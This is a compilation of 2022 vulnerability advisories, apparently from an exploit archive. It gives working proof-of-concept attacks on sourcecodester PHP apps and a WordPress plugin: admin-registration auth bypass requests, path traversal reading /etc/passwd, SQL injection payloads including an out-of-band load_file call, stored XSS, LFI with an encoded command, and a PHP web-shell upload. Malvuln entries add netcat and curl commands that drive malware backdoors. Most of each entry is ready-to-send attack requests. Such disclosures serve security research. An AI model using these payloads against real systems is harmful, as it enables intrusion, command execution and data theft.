<pre><code># Exploit Title: Royale Event Management System 1.0 - Authentication Bypass<br /># Date: 25/03/2022<br /># Exploit Author: Mr Empy<br /># Software Link:<br />https://www.sourcecodester.com/php/15238/event-management-system-project-php-source-code.html<br /># Version: 1.0<br /># Tested on: Linux<br /><br /><br />Title:<br />================<br />Royale Event Management System 1.0 - Authentication Bypass<br /><br /><br />Summary:<br />================<br />Royale Event Management System version 1.0 is affected by a vulnerability<br />that allows an attacker to bypass authentication. Because of the lack of<br />session validation, the attacker could register a user with administrative<br />permissions over the application and gain full access to it.<br /><br /><br />Severity Level:<br />================<br />7.3 (High)<br />CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L<br /><br /><br />Affected Product:<br />================<br />Royale Event Management System v1.0<br /><br /><br />Steps to Reproduce:<br />================<br /><br />1. Open a request repeater (like Burp Suite) and send this request:<br /><br />POST /royal_event/userregister.php HTTP/1.1<br />Host: target.com<br />Content-Length: 164<br />Cache-Control: max-age=0<br />Upgrade-Insecure-Requests: 1<br />Origin: http://target.com<br />Content-Type: application/x-www-form-urlencoded<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like<br />Gecko) Chrome/95.0.4638.69 Safari/537.36<br />Accept:<br />text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Referer: http://target.com/one_church/userregister.php<br />Accept-Encoding: gzip, deflate<br />Accept-Language: pt-PT,pt;q=0.9,en-US;q=0.8,en;q=0.7<br />Connection: close<br /><br />dignity=Admin&staffid=1000&fullname=<NICKNAME_HERE>&firstname=<FIRST_NAME>&lastname=<LAST_NAME>&mobileno=2520000000&emailid=<YOUR_EMAIL>&password=<YOUR_PASSWORD>&confirmpassword=<YOUR_PASSWORD>&signup=Register<br /><br />Fill in the parameters with the values according to each one of them and<br />send the request.<br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/35f0d754f161af35241cb081c73ea6dd.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Avstral.e<br />Vulnerability: Unauthenticated Remote Command Execution<br />Family: Avstral<br />Type: PE32<br />MD5: 35f0d754f161af35241cb081c73ea6dd<br />Vuln ID: MVID-2022-0529<br />Dropped files: mssys.exe<br />Disclosure: 03/27/2022<br />Description: The malware listens on TCP port 10002. Third-party adversaries who can reach an infected host can run commands made available by the backdoor.<br /><br />Commands.<br />RUNF<br />PROC<br />LIST<br />FIND<br />DELE<br />UPLF<br />DOWF<br /><br />E.g. start calc.exe, RUNF"calc" <br /><br />Exploit/PoC:<br />C:\>nc64.exe x.x.x.x 10002<br />C:\WINDOWS<br />C:\WINDOWS\system32RUNF"calc"<br />Succesful<br />C:\WINDOWS\system32PROC<br />[System Process]<br />System<br />smss.exe<br />csrss.exe<br />wininit.exe<br />csrss.exe<br />winlogon.exe<br />services.exe<br />lsass.exe<br />fontdrvhost.exe<br />fontdrvhost.exe<br />svchost.exe<br />svchost.exe<br />dwm.exe<br />svchost.exe<br />svchost.exe<br />svchost.exe<br />svchost.exe<br />svchost.exe<br />Memory Compression<br />svchost.exe<br />svchost.exe<br />svchost.exe<br />svchost.exe<br />svchost.exe<br />svchost.exe<br />spoolsv.exe<br />svchost.exe<br />sihost.exe<br />svchost.exe<br />svchost.exe<br />svchost.exe<br />VGAuthService.exe<br />vmtoolsd.exe<br />SecurityHealthService.exe<br />svchost.exe<br />taskhostw.exe<br />WmiPrvSE.exe<br />ctfmon.exe<br />explorer.exe<br />dllhost.exe<br />dllhost.exe<br />ShellExperienceHost.exe<br />SearchUI.exe<br />RuntimeBroker.exe<br />RuntimeBroker.exe<br />RuntimeBroker.exe<br />SearchIndexer.exe<br />msdtc.exe<br />VSSVC.exe<br />ProcessHacker.exe<br />vm3dservice.exe<br />vmtoolsd.exe<br />WmiPrvSE.exe<br />mssys.exe<br />explorer.exe<br />svchost.exe<br />explorer.exe<br />pestudio.exe<br />backgroundTaskHost.exe<br />WmiApSrv.exe<br />*************************************************************<br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: WordPress Plugin admin-word-count-column 2.2 - Local<br />File Download<br /># Google Dork: inurl:/wp-content/plugins/admin-word-count-column/<br /># Date: 27-03-2022<br /># Exploit Author: Hassan Khan Yusufzai - Splint3r7<br /># Vendor Homepage:<br />https://wordpress.org/plugins/admin-word-count-column/<br /><https://wordpress.org/plugins/video-synchro-pdf/><br /># Version: 2.2<br /># Contact me: h [at] spidersilk.com<br /><br /># PHP version: 5.3.2 or below<br /><br /># Vulnerable File: plugins/admin-word-count-column/download-csv.php<br /><br /># Vulnerable Code:<br /><br />```<br /><?php<br />date_default_timezone_set('America/Los_Angeles');<br />$csvdate = date('Md-H-i-s-T');<br />$csvname = 'wordcounts-' . $csvdate . '.csv';<br />header('Content-Type: application/csv');<br />header('Content-Disposition: attachment; filename=' . $csvname);<br />header('Pragma: no-cache');<br />readfile($_GET['path'] . 'cpwc.csv');<br />?><br />```<br /><br /># Proof of Concept:<br /><br />localhost/wp-content/plugins/admin-word-count-column/download-csv.php?path=../../../../../../../../../../../../etc/passwd\0<br /><br />Note: Null byte injection will only working in php 5.3.2 and below 5.3.2.<br /></code></pre>
<pre><code>## Title: Online Banking System v1.0 SQLi<br />## Author: nu11secur1ty<br />## Date: 03.27.2022<br />## Vendor: https://www.sourcecodester.com/users/tips23<br />## Software: https://www.sourcecodester.com/php/14868/banking-system-using-php-free-source-code.html<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Banking-System<br /><br />## Description:<br />The id parameter appears to be vulnerable to SQL injection attacks.<br />The payload '+(select<br />load_file('\\\\nf6v7f8u0moiaudh9ebxwywdt4zxnqbhe55svgk.sourcecodester.com/php/14868/banking-system-using-php-free-source-code.html\\crc'))+'<br />was submitted in the id parameter. This payload injects a SQL<br />sub-query that calls MySQL's load_file function with a UNC file path<br />that references a URL on an external domain.<br />The application interacted with that domain, indicating that the<br />injected SQL query was executed.<br />The attacker can take administrator account control and also of all<br />accounts on this system, also the malicious user can download all<br />information about this system.<br /><br />Status: CRITICAL<br /><br />[+] Payloads:<br /><br />```mysql<br /><br />---<br />Parameter: id (GET)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: id=3' AND 4573=4573-- ZCvc&p=view_accouncement<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or<br />GROUP BY clause (FLOOR)<br /> Payload: id=3' AND (SELECT 9948 FROM(SELECT<br />COUNT(*),CONCAT(0x7162707a71,(SELECT<br />(ELT(9948=9948,1))),0x7162787a71,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- nCRY&p=view_accouncement<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: id=3' AND (SELECT 7546 FROM (SELECT(SLEEP(5)))WNiD)--<br />MTfV&p=view_accouncement<br />---<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Banking-System)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/3gw6aw)<br /><br /><br />-- <br />System Administrator - Infrastructure Engineer<br />Penetration Testing Engineer<br />Exploit developer at<br />https://packetstormsecurity.com/https://cve.mitre.org/index.html and<br />https://www.exploit-db.com/<br />home page: https://www.nu11secur1ty.com/<br />hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=<br /> nu11secur1ty <http://nu11secur1ty.com/><br /><br /><br />-- <br />System Administrator - Infrastructure Engineer<br />Penetration Testing Engineer<br />Exploit developer at https://packetstormsecurity.com/<br />https://cve.mitre.org/index.html and https://www.exploit-db.com/<br />home page: https://www.nu11secur1ty.com/<br />hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=<br /> nu11secur1ty <http://nu11secur1ty.com/><br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/c16b04a9879896ef453a6deb13528087_B.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Chubo.c<br />Vulnerability: Cross Site Scripting (XSS)<br />Family: Chubo<br />Type: Web Panel<br />MD5: c16b04a9879896ef453a6deb13528087<br />Vuln ID: MVID-2022-0528<br />Disclosure: 03/26/2022<br />Description: The malware listens on TCP port 81 and 8080. There is a HTML web-panel that exposes the entire system and creates HTML links to run commands made available by the backdoor. Chubo panel users who visit a third-party attacker website or click an infected link, can trigger arbitrary client side JS code execution in the security context of the current user. This can result in data theft or GEO location disclosure of the user accessing the Chubo web interface.<br /><br />Exploit/PoC:<br />1) http://x.x.x.x:81/?DIR=%3C/h2%3E%3Cscript%3Ealert(%22malvuln%22)%3C/script%3E%3C!--<br />2) http://x.x.x.x:81/?BRW=%3C/h2%3E%3Cscript%3Ealert(%22malvuln%22)%3C/script%3E%3C!--<br />3) http://x.x.x.x:81/?TGT=%3C/h2%3E%3Cscript%3Ealert(%22malvuln%22)%3C/script%3E%3C!--<br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/c16b04a9879896ef453a6deb13528087.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Chubo.c<br />Vulnerability: Unauthenticated Remote Command Execution<br />Family: Chubo<br />Type: PE32<br />MD5: c16b04a9879896ef453a6deb13528087<br />Vuln ID: MVID-2022-0527<br />Disclosure: 03/26/2022<br />Description: The malware listens on TCP port 81 and 8080. There is a HTML web-panel that exposes the entire system and creates HTML links to run commands made available by the backdoor.<br /><br />Commands:<br /><br />F="./?DRV=">LIST DRIVE</A></TD><br /> <TD><A HREF="./?DIR=">LIST DIRECTRY</A></TD><br /> <TD><A HREF="./?MF_=">MANAGE FILE</A></TD><br /> <TD><A HREF="./?UPL=">UPLOAD FILE</A></TD> </TR><br /><TR><TD><A HREF="./?EXE=">EXECUTE COMMAND</A></TD><br /> <TD><A HREF="./?REG=">EDIT REGISTORY</A></TD><br /> <TD><A HREF="./?SYS=">GET SYSTEM INFO</A></TD><br /> <TD><A HREF="./?TGT=">SET PROXY TARGET</A></TD> </TR><br /><TR><TD><A HREF="./?SSS=">START SCREEN SAVER</A></TD><br /> <TD><A HREF="./?SND=">PLAY SOUND</A></TD><br /> <TD><A HREF="./?BRW=">BROWSE URL</A></TD><br /> <TD><A HREF="./?SCAN=">SCAN IP</A></TD><br /><br /><br />Exploit/PoC:<br />C:\>curl http://x.x.x.x:81/?EXE=calc<br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: Microfinance Management System 1.0 - Cross-site scripting<br />stored (unauthenticated)<br /># Date: 23/03/2022<br /># Exploit Author: Mr Empy<br /># Software Link:<br />https://www.sourcecodester.com/php/14822/microfinance-management-system.html<br /># Version: 1.0<br /># Tested on: Linux<br /><br /><br />Title:<br />================<br />Microfinance Management System 1.0 - Cross-site scripting stored<br />(unauthenticated)<br /><br /><br />Summary:<br />================<br />Microfinance Management System version 1.0 is affected by the Cross-site<br />Scripting vulnerability due to poor hygiene in certain parameters. The<br />attacker could take advantage of this flaw to inject arbitrary javascript<br />code to manipulate the victim's browser capabilities.<br /><br /><br />Severity Level:<br />================<br />6.5 (Medium)<br />CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N<br /><br /><br />Affected Product:<br />================<br />Microfinance Management System v1.0<br /><br /><br />Steps to Reproduce:<br />================<br /><br />1. Open a request repeater (like Burp Suite) and send this request:<br /><br />POST /mims/app/addcustomerHandler.php HTTP/1.1<br />Host: target.com<br />Content-Length: 310<br />Cache-Control: max-age=0<br />Upgrade-Insecure-Requests: 1<br />Origin: http://target.com<br />Content-Type: application/x-www-form-urlencoded<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like<br />Gecko) Chrome/95.0.4638.69 Safari/537.36<br />Accept:<br />text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Referer: http://target.com/mims/addcustomer.php<br />Accept-Encoding: gzip, deflate<br />Accept-Language: pt-PT,pt;q=0.9,en-US;q=0.8,en;q=0.7<br />Connection: close<br /><br />customer_number=335341988&customer_type=14465108&first_name=<XSS PAYLOAD<br />HERE>&middle_name=<XSS PAYLOAD HERE>&surname=<XSS PAYLOAD<br />HERE>&nationality=Tanzanian&date_of_birth=2000-01-01&gender=O&addcustomer=<br /><br />You can find your XSS payload in the /mims/managecustomer.php endpoint.<br /></code></pre>
<pre><code># Title: PDF Generator Web App using TCPDF 1.0 LFI To RCE<br /># Author: Hejap Zairy<br /># Date: 26.07.2022<br /># Vendor: https://www.sourcecodester.com/php/15243/pdf-generator-web-app-using-tcpdf-and-phpoop-free-source-code.html<br /># Software:https://www.sourcecodester.com/sites/default/files/download/oretnom23/pdf_generator.zip<br /># Reference: https://github.com/Matrix07ksa<br /># Tested on: Windows, MySQL, Apache<br /><br /><br /><br />#vulnerability Code php<br />Needs more filtering require_once<br /><br />php```<br /><?php <br />session_start();<br />require_once('db-connect.php');<br />$page = isset($_GET['page']) ? $_GET['page'] : 'home';<br />$page_name = explode("/",$page)[count(explode("/",$page)) -1];<br />?><br />```<br /><br /><br />[+] Payload GET<br /><br /><br />```<br />GET /pdf_generator/?page=../../../0day&515=%74%79%70%65%20%43%3a%5c%30%64%61%79%5f%48%65%6a%61%70%5f%2e%74%78%74%20%26%26%20%64%69%72%20%43%3a%5c HTTP/1.1<br />Host: 0day.gov<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Connection: close<br />Content-Length: 354<br />Cookie: PHPSESSID=av2qn4bthu78hm972lul6vmniv<br />Upgrade-Insecure-Requests: 1<br />```<br /><br /><br />#Status: CRITICAL<br /><br /><br />#Response <br />```<br /><br /><div class="card card-body blur shadow-blur mx-3 mx-md-4 mt-n6"><br />Hegap Zairy 0day Volume in drive C is OS<br />Volume Serial Number is 2EF1-9DCA<br /><br /> Directory of C:\<br /><br />03/18/2022 10:27 AM <DIR> Program Files<br />03/21/2022 01:45 PM <DIR> Program Files (x86)<br />03/02/2022 11:04 PM <DIR> Python27<br />03/26/2022 08:33 PM <DIR> Temp<br />03/26/2022 08:45 PM <DIR> Users<br /><br />```<br /><br /><br /><br /># Description:<br />Local File Inclusion is an attack technique in which attackers trick a web application into either running or exposing files on a web server or execution file If converted rce<br /># Proof and Exploit:<br />https://i.imgur.com/M5EbrT8.png<br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/b24c56abb4bde960c2d51d4e509d2c68.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Cafeini.b<br />Vulnerability: Denial of Service<br />Family: Cafeini<br />Type: PE32<br />MD5: b24c56abb4bde960c2d51d4e509d2c68<br />Vuln ID: MVID-2022-0525<br />Disclosure: 03/25/2022<br />Description: The malware listens on TCP port 51966 and is packed by a modified UPX implementation. Third-party adversaries who can reach an infected system can terminate the malware by issuing the cmd DIEDIEDIE, without being required to authenticate.<br /><br />UPX1:004560B4 aDiediedie db 'DIEDIEDIE',0 ; DATA XREF: sub_406C68:loc_40739E<br />UPX1:004560B4 ; sub_40DB4D+255B<br />UPX1:004560BE align 10h<br /><br />Exploit/PoC:<br />C:\>nc64.exe x.x.x.x 51966<br /> CAFEiNi 1.1<br />Enter your password:<br />DIEDIEDIE<br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Title: Pay Slip PDF Generator System 1.0 Shell Upload<br /># Author: Hejap Zairy<br /># Date: 26.07.2022<br /># Vendor: https://www.sourcecodester.com/php/15242/employees-pay-slip-pdf-generator-system-email-using-phpoop-free-source-code.html<br /># Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/pess_0.zip<br /># Reference: https://github.com/Matrix07ksa<br /># Tested on: Windows, MySQL, Apache<br /><br />registered user can bypass waf upload .php.png files in attachments section with use of intercept tool in burbsuite to edit the raw<br /><br /><br />#vulnerability Code php<br />Needs more filtering to upload profile files<br /><br />php```<br /><script><br /> function displayImg(input,_this) {<br /> if (input.files && input.files[0]) {<br /> var reader = new FileReader();<br /> reader.onload = function (e) {<br /> $('#cimg').attr('src', e.target.result);<br /> }<br /><br /> reader.readAsDataURL(input.files[0]);<br /> }<br /> }<br /> $('#manage-user').submit(function(e){<br /> e.preventDefault();<br />```<br /><br /><br />[+] Payload POST<br /><br /><br />```<br />POST /pess/admin/user/manage_user.php HTTP/1.1<br />Host: 0day.gov<br />Cookie: PHPSESSID=2vah9hmhjf85ichdav814rhcgu<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: multipart/form-data; boundary=---------------------------409902128312379197203124536738<br />Content-Length: 882<br />Origin: https://0day.gov<br />Referer: https://0day.gov/pess<br />Upgrade-Insecure-Requests: 1<br />Te: trailers<br />Connection: close<br /><br />-----------------------------409902128312379197203124536738<br />Content-Disposition: form-data; name="productName"<br />Hejap Zairy<br />-----------------------------409902128312379197203124536738<br />Content-Disposition: form-data; name="productimage1"; filename="0day_hejap.php"<br />Content-Type: image/png<br /><br /><?=`$_GET[515]`?><br /><br />-----------------------------409902128312379197203124536738<br />Content-Disposition: form-data; name="submit"<br />-----------------------------409902128312379197203124536738--<br />```<br /><br /><br />#Status: CRITICAL<br /><br />[+] Payload GET<br /><br />```<br />GET /pess/uploads/0day_hejap.php?515=echo+Hejap+Zairy HTTP/1.1<br /><br />Host: 0day.gov<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Connection: close<br />Cookie: PHPSESSID=pqbgvck1gedt9if6p582nt9a41<br />Upgrade-Insecure-Requests: 1<br /><br /><br /><br /><br />```<br /><br />#Response <br />```<br />HTTP/1.1 200 OK<br />Date: Thu, 26 Mar 2022 11:15:56 GMT<br />Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27<br />X-Powered-By: PHP/7.4.27<br />Content-Length: 12<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br /><br />Hejap Zairy<br />```<br /><br /><br /># Description:<br />The file upload bypass WAF vulnerability occurs when the user uploads an executable script file, and through the script file to obtain the ability to execute server-side commands. This attack is the most direct and effective, sometimes having almost no technical barriers.<br /><br /># Proof and Exploit:<br />https://i.imgur.com/YFsD2Ub.png<br /></code></pre>